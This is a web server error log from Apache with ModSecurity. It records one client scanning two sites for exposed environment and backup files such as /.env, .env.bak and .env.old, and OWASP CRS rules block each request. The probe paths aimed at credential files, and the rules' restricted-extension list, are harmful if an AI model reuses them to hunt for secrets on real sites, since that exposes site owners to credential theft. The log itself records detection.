[Sun Nov 16 06:04:57.110582 2025] [:error] [pid 105760] [client 13.62.46.112:55110] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.bak"] [unique_id "aRlbeSX-V6YaRQK52Hc2AgAAAAU"]
[Sun Nov 16 06:04:57.110740 2025] [:error] [pid 105760] [client 13.62.46.112:55110] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.bak"] [unique_id "aRlbeSX-V6YaRQK52Hc2AgAAAAU"]
[Sun Nov 16 06:04:57.110928 2025] [:error] [pid 105760] [client 13.62.46.112:55110] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.bak"] [unique_id "aRlbeSX-V6YaRQK52Hc2AgAAAAU"]
[Sun Nov 16 06:04:57.111077 2025] [:error] [pid 105760] [client 13.62.46.112:55110] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.bak"] [unique_id "aRlbeSX-V6YaRQK52Hc2AgAAAAU"]
[Sun Nov 16 06:04:57.161505 2025] [:error] [pid 106191] [client 13.62.46.112:55134] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.old"] [unique_id "aRlbeZ9TX0jrupNVR0KhPwAAAAI"]
[Sun Nov 16 06:04:57.161663 2025] [:error] [pid 106191] [client 13.62.46.112:55134] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.old"] [unique_id "aRlbeZ9TX0jrupNVR0KhPwAAAAI"]
[Sun Nov 16 06:04:57.162357 2025] [:error] [pid 106191] [client 13.62.46.112:55134] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.old"] [unique_id "aRlbeZ9TX0jrupNVR0KhPwAAAAI"]
[Sun Nov 16 06:04:57.162517 2025] [:error] [pid 106191] [client 13.62.46.112:55134] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env.old"] [unique_id "aRlbeZ9TX0jrupNVR0KhPwAAAAI"]
[Sun Nov 16 06:04:57.191281 2025] [:error] [pid 105754] [client 13.62.46.112:55124] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.save"] [unique_id "aRlbeX3mxOhUaPa_1PS3NgAAAAw"]
[Sun Nov 16 06:04:57.191484 2025] [:error] [pid 105754] [client 13.62.46.112:55124] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.save"] [unique_id "aRlbeX3mxOhUaPa_1PS3NgAAAAw"]
[Sun Nov 16 06:04:57.191655 2025] [:error] [pid 105754] [client 13.62.46.112:55124] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.save"] [unique_id "aRlbeX3mxOhUaPa_1PS3NgAAAAw"]
[Sun Nov 16 06:04:57.209665 2025] [:error] [pid 103446] [client 13.62.46.112:55144] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.old"] [unique_id "aRlbeU-c4YqyOTFJOSeIXAAAAAk"]
[Sun Nov 16 06:04:57.209808 2025] [:error] [pid 103446] [client 13.62.46.112:55144] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.old"] [unique_id "aRlbeU-c4YqyOTFJOSeIXAAAAAk"]
[Sun Nov 16 06:04:57.209975 2025] [:error] [pid 103446] [client 13.62.46.112:55144] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.old"] [unique_id "aRlbeU-c4YqyOTFJOSeIXAAAAAk"]
[Sun Nov 16 06:04:57.210119 2025] [:error] [pid 103446] [client 13.62.46.112:55144] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.old"] [unique_id "aRlbeU-c4YqyOTFJOSeIXAAAAAk"]
[Sun Nov 16 06:04:57.229392 2025] [authz_core:error] [pid 106193] [client 13.62.46.112:55178] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Sun Nov 16 06:04:57.234967 2025] [authz_core:error] [pid 103398] [client 13.62.46.112:55180] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env.bak
[Sun Nov 16 06:04:57.245238 2025] [:error] [pid 105733] [client 13.62.46.112:55138] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.bak"] [unique_id "aRlbeQm3iQ6of_5tM-vZFwAAAAY"]
[Sun Nov 16 06:04:57.245380 2025] [:error] [pid 105733] [client 13.62.46.112:55138] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.bak"] [unique_id "aRlbeQm3iQ6of_5tM-vZFwAAAAY"]
[Sun Nov 16 06:04:57.245555 2025] [:error] [pid 105733] [client 13.62.46.112:55138] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.bak"] [unique_id "aRlbeQm3iQ6of_5tM-vZFwAAAAY"]
[Sun Nov 16 06:04:57.245690 2025] [:error] [pid 105733] [client 13.62.46.112:55138] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env.bak"] [unique_id "aRlbeQm3iQ6of_5tM-vZFwAAAAY"]
[Sun Nov 16 06:04:57.272250 2025] [:error] [pid 105715] [client 13.62.46.112:55164] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aRlbeTHqqjYXoy22w5Lv8wAAAAE"]
[Sun Nov 16 06:04:57.272443 2025] [:error] [pid 105715] [client 13.62.46.112:55164] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aRlbeTHqqjYXoy22w5Lv8wAAAAE"]
[Sun Nov 16 06:04:57.272605 2025] [:error] [pid 105715] [client 13.62.46.112:55164] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aRlbeTHqqjYXoy22w5Lv8wAAAAE"]
[Sun Nov 16 06:04:57.298586 2025] [authz_core:error] [pid 105706] [client 13.62.46.112:55158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env.save
[Sun Nov 16 06:04:57.300806 2025] [:error] [pid 105761] [client 13.62.46.112:55212] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.save"] [unique_id "aRlbeRajcO0QlxhJbyzqWwAAAAo"]
[Sun Nov 16 06:04:57.301009 2025] [:error] [pid 105761] [client 13.62.46.112:55212] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.save"] [unique_id "aRlbeRajcO0QlxhJbyzqWwAAAAo"]
[Sun Nov 16 06:04:57.301159 2025] [:error] [pid 105761] [client 13.62.46.112:55212] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.save"] [unique_id "aRlbeRajcO0QlxhJbyzqWwAAAAo"]
[Sun Nov 16 06:04:57.417964 2025] [:error] [pid 105760] [client 13.62.46.112:55198] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aRlbeSX-V6YaRQK52Hc2AwAAAAU"]
[Sun Nov 16 06:04:57.418162 2025] [:error] [pid 105760] [client 13.62.46.112:55198] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aRlbeSX-V6YaRQK52Hc2AwAAAAU"]
[Sun Nov 16 06:04:57.418335 2025] [:error] [pid 105760] [client 13.62.46.112:55198] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aRlbeSX-V6YaRQK52Hc2AwAAAAU"]
[Sun Nov 16 06:04:57.467311 2025] [:error] [pid 106193] [client 13.62.46.112:55274] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.bak"] [unique_id "aRlbeRmZz13emZeNiG2t-AAAAAg"]
[Sun Nov 16 06:04:57.467462 2025] [:error] [pid 106193] [client 13.62.46.112:55274] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.bak"] [unique_id "aRlbeRmZz13emZeNiG2t-AAAAAg"]
[Sun Nov 16 06:04:57.467652 2025] [:error] [pid 106193] [client 13.62.46.112:55274] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.bak"] [unique_id "aRlbeRmZz13emZeNiG2t-AAAAAg"]
[Sun Nov 16 06:04:57.467805 2025] [:error] [pid 106193] [client 13.62.46.112:55274] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/system/.env.bak"] [unique_id "aRlbeRmZz13emZeNiG2t-AAAAAg"]
[Sun Nov 16 06:04:57.500659 2025] [:error] [pid 106191] [client 13.62.46.112:55224] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.bak"] [unique_id "aRlbeZ9TX0jrupNVR0KhQAAAAAI"]
[Sun Nov 16 06:04:57.500812 2025] [:error] [pid 106191] [client 13.62.46.112:55224] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env.bak"] [unique_id "aRlbeZ9TX0jrupNVR0KhQAAAAAI"]
